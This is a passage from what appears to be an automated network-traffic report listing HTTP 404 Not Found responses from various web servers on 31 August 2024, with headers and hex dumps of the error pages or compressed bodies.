Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:04:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Saxbh3XZbzatdsLCj8P8CisZ6wL7kM0wkeAgbhBDhQ7XNu3oj1htr5UzP%2FwrgyQcxDdaj0s0%2BVLHZVzv994iblhRr%2B7v4b7poApAbrNsfsDMYiaJkj55Z%2BejkCr69T55dwvfmw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce1f7ce2b436c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 9b a5 d0 85 78 23 67 1d 7a d8 8e 69 b9 bb 72 07 a5 b7 d0 85 a3 1f 65 6b 1c 0d 2b 4b 3a 69 e2 24 57 fa df 0f 39 c9 be b4 12 c8 92 fc cc a3 99 67 46 aa af 7e ff fb b7 87 af f7 7f 80 e6 c1 34 b3 3a 7d 20 f2 d1 e0 66 ae 91 b6 9a cb 5c 88 37 f3 f4 0b a5 6a 66 f5 80 2c c1 ca 01 37 f3 91 70 ef 5d e0 39 74 ce 32 5a de cc f7 a4 58 6f 14 8e d4 61 36 2d 16 40 96 98 a4 c9 62 27 0d 6e f2 05 44 1d c8 3e 66 ec b2 9e 78 63 5d 62 67 62 83 0d 14 a2 80 cf 8e e1 a3 db 59 f5 cb ac 5e 9e f6 eb c9 a5 e6 fd 80 8a 24 bc f5 01 7b 0c 31 eb 9c 71 21 8b 9d c6 01 4b 25 c3 e3 cd b7 d6 a9 e3 b7 56 76 8f db 90 28 4e 90 f2 5a 08 71 45 43 72 56 5a fe fe bd 5e 9e 08 eb e5 39 aa 64 76 89 fb 64 02 d7 45 51 54 30 c8 b0 25 5b 8a aa 77 96 4b b0 2e 0c d2 40 5e f8 c3 72 25 fc 01 3e 04 92 66 01 7f a2 19 91 a9 93 0b 88 d2 c6 2c 62 a0 be 82 17 12 56 f0 93 57 70 dd f7 7d 95 a2 57 34 fe a0 ba dc b1 ab 60 20 9b bd e2 98 37 90 da 4b 03 c6 03 67 d2 d0 d6 96 d0 a1 65 0c 15 4c ca 97 bf 0a e1 0f 97 10 32 83 3d 97 90 15 a7 4d ef 22 31 39 5b ca 36 3a b3 63 ac 80 9d 2f e1 2e 9d 32 41 d7 e2 4d f2 0d ce ad d6 f9 e5 c4 27 4d 20 89 92 45 fa 0f cb 7c 3d d1 1a b2 f8 e4 f1 69 6b c2 ec 4f 5b ad 33 aa 9a 37 85 28 ea a5 ce 53 51 ad 5e 93 66 c9 89 24 6c f5 4c 0d 77 69 3d 6f 5e d5 85 5e 35 b3 da 37 0f 1a 21 60 74 bb d0 a5 c9 bf 3b 8c 8c 0a 3a b7 33 0a ac 63 68 11 fa 64 03 ce 02 6b 8a 10 31 8c 18 ae ea a5 6f 66 f5 52 d1 d8 9c c7 17 92 9e 8b a6 17 a9 bf 8a 72 e5 0f d5 39 fc 29 43 5e 2a 45 76 5b a6 52 48 6e c2 65 52 3d 09 1c d0 48 a6 11 ab ce a0 0c 65 eb 58 57 cf 39 7d e2 9b 22 cf 72 91 fb 43 f5 73 fd 16 ef 52 af 5a 17 Data Ascii: 2cbdTm80x#gzirek+K:i$W9gF~4:} f\7jf,7p]9t2ZXoa6-@b'nD>fxc]bgbY^${1q!K%Vv(NZqECrVZ^9dvdEQT0%[wK.@^r%>f,bVWp}W4` 7KgeL2=M"19[6:c/.2AM'M E\|=ikO[37(SQ^f$lLwi=o^^57!`t;:3chdk1ofRr9)C^*Ev[RHneR=HeXW9}"rCsRZ
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:04:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLC0p9NnwOnRhL%2BhpHt8oYW5aC%2F3%2FOm8%2FABUV2cSWcfrv8%2FB6859qLQYvk2%2BPPqE6KNBeXmay9wA0yBXuSl4XdWglYLvqP%2BSxToL0BlXokgCE%2FaPt4nbuxMiCW3qwCQE2Tz%2Flg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce207affa0f49-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 9b a5 d0 85 78 23 67 1d 7a d8 8e 69 b9 bb 72 07 a5 b7 d0 85 a3 1f 65 6b 1c 0d 2b 4b 3a 69 e2 24 57 fa df 0f 39 c9 be b4 12 c8 92 fc cc a3 99 67 46 aa af 7e ff fb b7 87 af f7 7f 80 e6 c1 34 b3 3a 7d 20 f2 d1 e0 66 ae 91 b6 9a cb 5c 88 37 f3 f4 0b a5 6a 66 f5 80 2c c1 ca 01 37 f3 91 70 ef 5d e0 39 74 ce 32 5a de cc f7 a4 58 6f 14 8e d4 61 36 2d 16 40 96 98 a4 c9 62 27 0d 6e f2 05 44 1d c8 3e 66 ec b2 9e 78 63 5d 62 67 62 83 0d 14 a2 80 cf 8e e1 a3 db 59 f5 cb ac 5e 9e f6 eb c9 a5 e6 fd 80 8a 24 bc f5 01 7b 0c 31 eb 9c 71 21 8b 9d c6 01 4b 25 c3 e3 cd b7 d6 a9 e3 b7 56 76 8f db 90 28 4e 90 f2 5a 08 71 45 43 72 56 5a fe fe bd 5e 9e 08 eb e5 39 aa 64 76 89 fb 64 02 d7 45 51 54 30 c8 b0 25 5b 8a aa 77 96 4b b0 2e 0c d2 40 5e f8 c3 72 25 fc 01 3e 04 92 66 01 7f a2 19 91 a9 93 0b 88 d2 c6 2c 62 a0 be 82 17 12 56 f0 93 57 70 dd f7 7d 95 a2 57 34 fe a0 ba dc b1 ab 60 20 9b bd e2 98 37 90 da 4b 03 c6 03 67 d2 d0 d6 96 d0 a1 65 0c 15 4c ca 97 bf 0a e1 0f 97 10 32 83 3d 97 90 15 a7 4d ef 22 31 39 5b ca 36 3a b3 63 ac 80 9d 2f e1 2e 9d 32 41 d7 e2 4d f2 0d ce ad d6 f9 e5 c4 27 4d 20 89 92 45 fa 0f cb 7c 3d d1 1a b2 f8 e4 f1 69 6b c2 ec 4f 5b ad 33 aa 9a 37 85 28 ea a5 ce 53 51 ad 5e 93 66 c9 89 24 6c f5 4c 0d 77 69 3d 6f 5e d5 85 5e 35 b3 da 37 0f 1a 21 60 74 bb d0 a5 c9 bf 3b 8c 8c 0a 3a b7 33 0a ac 63 68 11 fa 64 03 ce 02 6b 8a 10 31 8c 18 ae ea a5 6f 66 f5 52 d1 d8 9c c7 17 92 9e 8b a6 17 a9 bf 8a 72 e5 0f d5 39 fc 29 43 5e 2a 45 76 5b a6 52 48 6e c2 65 52 3d 09 1c d0 48 a6 11 ab ce a0 0c 65 eb 58 57 cf 39 7d e2 9b 22 cf 72 91 fb Data Ascii: 2d6dTm80x#gzirek+K:i$W9gF~4:} f\7jf,7p]9t2ZXoa6-@b'nD>fxc]bgbY^${1q!K%Vv(NZqECrVZ^9dvdEQT0%[wK.@^r%>f,bVWp}W4` 7KgeL2=M"19[6:c/.2AM'M E\|=ikO[37(SQ^f$lLwi=o^^57!`t;:3chdk1ofRr9)C^*Ev[RHneR=HeXW9}"r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:04:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=86bjImJuA%2F0n%2FLRlXncLifTMO8foW0m6pZmkbOKPGuEQliLrgn%2FOSmy2p3N1nV81Fms1VX0qapfeTVy4RQ%2FS95kODoe8MNPU5IjsdAj1jTgB4QrN74KSuWY%2FaXhwVHl6pa9JRw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce217be612363-EWRalt-svc: h3=":443"; ma=86400Data Raw: 34 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 Data Ascii: 4e0<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="mar
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 31 Aug 2024 12:04:33 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-31T12:04:38.2690131Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 31 Aug 2024 12:04:35 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-08-31T12:04:38.2690131Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 31 Aug 2024 12:04:38 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-31T12:04:43.3510227Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 31 Aug 2024 12:04:40 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-31T12:04:45.8867537Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 31 Aug 2024 12:05:08 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 31 Aug 2024 12:05:10 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 31 Aug 2024 12:05:13 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 31 Aug 2024 12:05:15 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:22 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:22 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:22 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:25 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:27 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:30 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 31 Aug 2024 12:06:22 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:16:59 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4765Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 db 46 72 ff b9 fe 2b b6 8c 13 52 0e 49 90 d4 77 89 52 ca 50 94 c4 8b 24 32 24 e5 ef 2e 1f 08 2e 49 58 20 00 03 4b 49 b4 e3 f7 92 f6 2e f1 b5 76 1c 5f d2 9c dd 26 cd 39 79 2f f6 4b 7a f6 f5 ae 4d 7c 49 9c fe 33 a2 24 ff d4 7f a1 b3 00 41 82 c0 82 a2 e9 84 ba 2b f4 24 11 8b d9 d9 cf cc ce cc ce 2c 01 c4 ff 76 29 93 2c 9c cb a6 50 8d d4 a5 c5 13 71 eb 1f e6 cb 8b 27 10 1c f1 3a 26 3c 12 6a bc a6 63 b2 e0 db 2c 2c 87 66 7c ed 4b 44 24 12 5e 3c f8 d3 f7 07 df 7f d6 ba 7d e7 e0 a3 cf 9e 7d 74 ef f0 f1 e3 38 67 5e b1 31 90 f9 3a 5e f0 69 4a 49 21 ba 0f 09 8a 4c b0 0c ec 64 45 94 cb 78 37 28 2b 15 45 92 94 1d 1f e2 da bd 74 d2 b4 38 d0 83 3b 85 5e e7 75 8c 4e 71 9d a6 92 52 6e a2 6b 9d 53 7a 08 8a a4 68 73 e8 a5 f1 f1 f1 f9 9e 0b 15 18 70 0e 45 a7 d4 5d 74 1a 6b 65 5e e6 83 c8 b7 8a a5 6d 4c 44 81 47 1b b8 81 7d 41 54 b3 1a 82 28 a1 89 bc 14 44 fe 75 51 d0 14 5d a9 10 74 8e 5f c5 a2 3f 88 74 5e d6 43 3a d6 c4 4a ef 10 75 5e ab 8a f2 1c 8a f4 36 ab 7c b9 2c ca 55 68 47 b1 08 0c 4f ff 74 29 ae 77 3e d5 a2 d7 98 ec a2 b4 53 c4 c9 95 ca 13 d2 c5 ab 78 0e c5 66 ec 0c 3b 17 77 b0 58 ad 81 cc 93 11 47 57 49 94 71 a8 d6 be 3a 1e f3 40 13 63 2b 76 22 36 33 23 e0 3e c3 4d 38 87 eb c8 4f 75 1f 61 ab 6c 